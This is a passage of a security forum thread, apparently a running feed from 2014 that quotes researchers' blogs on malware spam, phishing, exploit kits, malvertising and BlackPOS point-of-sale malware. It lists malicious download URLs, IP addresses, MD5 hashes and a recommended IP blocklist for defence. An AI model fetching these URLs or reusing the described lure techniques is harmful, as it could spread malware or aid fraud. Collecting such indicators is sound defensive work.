(More at the malwarebytes URL at the top.)
___

SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malware...ck-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustot...om/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
https://www.virustot...sis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustot...sis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether is it part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustot...sis/1408996125/

dnsdynamic .com - 84.45.76.100: https://www.virustot...00/information/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 26 August 2014 - 01:44 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1265 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 27 August 2014 - 05:43 AM

FYI...

Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo....lware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
    From:     Madikwe, Gladness [GMadikwe@mcm.co.uk]
    Date:     27 August 2014 10:43
    Subject:     Tax Invoice for Delivery Note 11155 dated 22.08.14
    Hello ,   
    Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
    Thank you      
    Regards
    Gladness B Madikwe
    Sales & Marketing Clerk
    Morupule Coal Mine ...


Screenshot: http://1.bp.blogspot...00/moropule.png

Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustot...sis/1409133512/
___

Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.c...-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most common used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the times only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
    Java .com
    Deviantart .com
    TMZ .com
    Photobucket .com
    IBTimes .com
    eBay .ie
    Kapaza .be
    TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IP’s having been associated with these domains:
    198.27.88.157: https://www.virustot...57/information/
    94.23.252.38: https://www.virustot...38/information/
    178.32.21.248: https://www.virustot...48/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___

"Customer Statements" - malware SPAM
- http://blog.dynamoo....lware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
    Fom:     Accounts [hiqfrancistown910@ gmail .com]
    Date:     27 August 2014 09:51
    Subject:     Customer Statements
    Good morning,attached is your statement.
    My regards.
    W ELIAS


Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustot...sis/1409135030/
___

Royal Bank of Canada Payment Spam
- http://threattrack.t...da-payment-spam
Aug 27, 2014 - "Subjects Seen:
    The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
    The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
    The transfer is now complete.
    Message recipient: The rating was not provided.
    See details in the attached report.
    Thank you for using the Service INTERAC Bank RBC Royal Bank.


Malicious File Name and MD5:
    INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
    INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D


Screenshot: https://gs1.wac.edge...OUqn1r6pupn.png

Tagged: RBC, Upatre
___

AT&T DocuSign Spam
- http://threattrack.t...t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
    Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
    Hello,
    AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.


Malicious URLs:
    79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
    Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
    Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)


Screenshot: https://gs1.wac.edge...fIWp1r6pupn.png

79.172.51.73: https://www.virustot...73/information/

Tagged: ATT, DocuSigin, Upatre

- http://myonlinesecur...ke-pdf-malware/
27 Aug 2014
___

ADP Past Due Invoice Spam
- http://threattrack.t...ue-invoice-spam
Aug 27, 2014 - "Subjects Seen:
    ADP Past Due Invoice
Typical e-mail details:
    Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
    If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
    Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
    Review your ADP past due invoice here...


Malicious URLs:
    81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
    invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
    invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)


Screenshot: https://gs1.wac.edge...SD3h1r6pupn.png

81.80.82.27: https://www.virustot...27/information/

Tagged: ADP, Upatre
___

Fake Payment Advice SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Disclaimer:
    This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
    AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
    Cell 270 547-9194


27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb)  
Extracts to   Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55* . This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409154303/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 27 August 2014 - 03:39 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1266 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 28 August 2014 - 07:05 PM

FYI...

The ‘Unknown’ Exploit Kit ...
- https://blog.malware...wn-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malware...rlight_only.png
Flash only:
> https://blog.malware.../Flash_only.png
Silverlight and Flash:
> https://blog.malware...t_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)
 

:ph34r: :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1267 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 29 August 2014 - 05:31 AM

FYI...

Fake 'new photo' SPAM - malware
- http://myonlinesecur...-photo-malware/
29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:

    my new photo  ..
    if you like my photo to send me u photo


29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustot...sis/1409297373/
___

Netflix PHISH ...
- https://blog.malware...u-high-and-dry/
Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malware...hish1.png?w=564
The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malware.../08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."

176.74.28.254: https://www.virustot...54/information/

netflix-ssl .net / 92.222.121.100: https://www.virustot...00/information/
8.31.2014 9:02AM EDT
___

Internet Disconnection SCAM calls
- http://www.hoax-slay...cam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___

Fake Refund email targets UK taxpayers
- https://blog.malware...s-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malware...08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for a HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malware...08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HRMC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov....y/reporting.htm
___

New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmic...etail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicr...em-breaches.pdf
___

Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquir...s-windows-store
Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows...-windows-store/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 31 August 2014 - 08:03 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1268 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 01 September 2014 - 04:56 AM

FYI...

Tesco Phish ...
- http://myonlinesecur...wards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
    Tesco Customer Satisfaction program selected you to take part in our quick survey.
    To earn your 150 £ reward, please click here and complete the form.


Screenshots:
- http://myonlinesecur...k-_rewards1.png

- http://myonlinesecur...k-_rewards2.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___

Fake Statement SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD, As far as we can determine they have not been hacked or their website or email system compromised... Email reads:

    Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.

1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55* . This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409570924/
___

O/S Market Share - August 2014 ...
- http://www.netmarket...=10&qpcustomd=0
Browser Market Share
- http://www.netmarket...d=0&qpcustomd=0
9/1/2014
___

China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.c...N0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 01 September 2014 - 09:44 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1269 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 02 September 2014 - 05:56 AM

FYI...

Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo....1188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimates ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
* http://www.malware-t...8/29/index.html

** http://blog.dynamoo....el/DINETHOSTING
___

Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecur...automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:

Attempting to contact <REDACTED>
    This is automated draw #23851
    Our system shows you have been awarded with £1000!
    According to our records, voucher wasn’t collected yet
    Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
    Confirm your email here to claim your £1000 voucher.
    Have fun !
    Lindsey Lane
    CRM Manager..
    * This offer is available to new players only.
    You have received this email because you have requested more information from BonusNews...


Clicking the button that says claim your reward (or any other of the buttons) gives you a  file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustot...29f89/analysis/
___

Hacks behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.o...t-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.nam...internet-users/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 02 September 2014 - 01:06 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1270 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 03 September 2014 - 05:36 AM

FYI...

Fake NDR SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...  Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email allegedly being sent by a Scottish Local Council should immediately alert a recipient in the rest of UK to being totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details. – If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...


3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409725854/

- http://blog.dynamoo....bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
    From:     Ebilling [Ebilling@ westlothian .gov.uk]
    Date:     3 September 2014 09:20
    Subject:     NDR Bill
    Please find attached your Non Domestic Rates bill...


Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165
..."
(More at the dynamoo URL above.)
* https://www.virustot...sis/1409733696/

** https://www.virustot...sis/1409734574/
___

“YouTube Account Manager has sent you a Message…”
- https://blog.malware...-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

    YouTube account manager has sent you a message
    We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
    Please follow the following instructions to recover your account:
    1. Please contact your account manager here: [url]
    2. You have to complete a quick survey to make sure you are human.
    3. Wait for our email explaining the next steps.
    * If you decide to ignore this message and not follow the above steps your account will be suspended.


This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwareb...untmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___

Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activityA number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co.uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...


3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409750135/
___

Fake attached CBE form SPAM - PDF malware
- http://myonlinesecur...rm-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed  and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
     Importat message, read right away.
    Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
    Please sign and send it back.
    Regards,
    ADP TotalSource Benefits Team


3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustot...sis/1409761379/
___

Fake 'August report' SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager

This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to   BACs_Documents.scr
and to    Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1409724912/
___

Fake Sky .com SPAM ...
- http://blog.dynamoo....spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
    Date:      Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
    From:      "Sky.com" [statement@ sky .com]
    Subject:      Statement of account
    Afternoon,
    Please find attached the statement of account.
